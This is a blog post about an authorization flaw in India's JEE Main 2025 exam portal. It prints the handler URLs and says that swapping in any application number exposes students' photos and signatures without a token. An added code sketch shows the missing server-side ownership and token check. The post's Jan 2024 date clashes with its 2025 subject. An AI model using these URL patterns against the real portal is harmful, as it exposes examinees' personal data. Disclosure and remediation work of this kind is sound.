rdsx.dev

Fri Jan 12 2024

2025 JEE Mains Students Data Leak

Learn how intermediate students outsmarted NTA engineers, who always deliver weak data protection, like many Indian government websites.

A Major Security Flaw Exposed in the NTA Portal: What You Need to Know

I've already created a detailed video on this issue, which you can watch here to get a complete understanding of the situation.

Demo Video

This post exists to expose more details on how the hack happened for you to explore, details that YouTube often restricts with its policies.

The official Reddit post is deleted: link

Here is the reddit post explaining the issue: link

The Vulnerability

Code:

Source code from JEE Main Info Fetcher: link

Explanation:

https://examinationservices.nic.in/JeeMain2025/Handler/DisplayCandImagePDF.ashx?appformid=101032511&appno=${appNumber}&docType=01
https://examinationservices.nic.in/JeeMain2025/Handler/DisplayCandImagePDF.ashx?appformid=101032511&appno=${appNumber}&docType=03

Neither of these endpoints requires a valid token to fetch the photo and signature. So substituting a valid application number for appNumber and visiting the URLs exposes the student data.
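The missing check, sketched as an added example (not code from the original post, the JEE Main Info Fetcher, or the NTA portal): the handler answers only when the logged-in session owns the requested appno and the link carries a short-lived HMAC token bound to that appno and docType. The names SECRET, issueToken and authorize, the token parameter and the application numbers are assumptions made for illustration.

```javascript
// Added example: all names here (SECRET, issueToken, authorize, token) are hypothetical.
const crypto = require("node:crypto");

const SECRET = crypto.randomBytes(32);            // server-side key, never sent to clients
const ALLOWED_DOC_TYPES = new Set(["01", "03"]);  // the two docType values shown on the page

function sign(appno, docType, expires) {
  return crypto.createHmac("sha256", SECRET)
    .update(`${appno}|${docType}|${expires}`)
    .digest("hex");
}

// Called after a candidate logs in; the token is bound to their own appno.
function issueToken(sessionAppno, docType, nowMs, ttlMs = 5 * 60 * 1000) {
  const expires = nowMs + ttlMs;
  return `${expires}.${sign(sessionAppno, docType, expires)}`;
}

// Returns the HTTP status the document handler should answer with.
function authorize(rawUrl, session, nowMs) {
  const q = new URL(rawUrl, "https://portal.invalid").searchParams;
  const appno = q.get("appno") || "";
  const docType = q.get("docType") || "";
  if (!/^\d{1,20}$/.test(appno) || !ALLOWED_DOC_TYPES.has(docType)) return 400;
  if (!session || !session.appno) return 401;   // no logged-in candidate
  if (session.appno !== appno) return 403;      // record belongs to someone else
  const [expStr, mac] = (q.get("token") || "").split(".");
  const expires = Number(expStr);
  if (!mac || !Number.isSafeInteger(expires) || expires < nowMs) return 403;
  const expected = Buffer.from(sign(appno, docType, expires), "hex");
  const given = Buffer.from(mac, "hex");        // malformed hex yields a length mismatch
  if (given.length !== expected.length || !crypto.timingSafeEqual(given, expected)) return 403;
  return 200;
}
```

The session ownership comparison is the essential control; the signed token additionally stops a leaked or guessed link from being reused for another document or after it expires.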

If you want a brief demo on how to identify these kinds of vulnerabilities, comment under my YouTube video and I'll make a dedicated tutorial video.

Bye
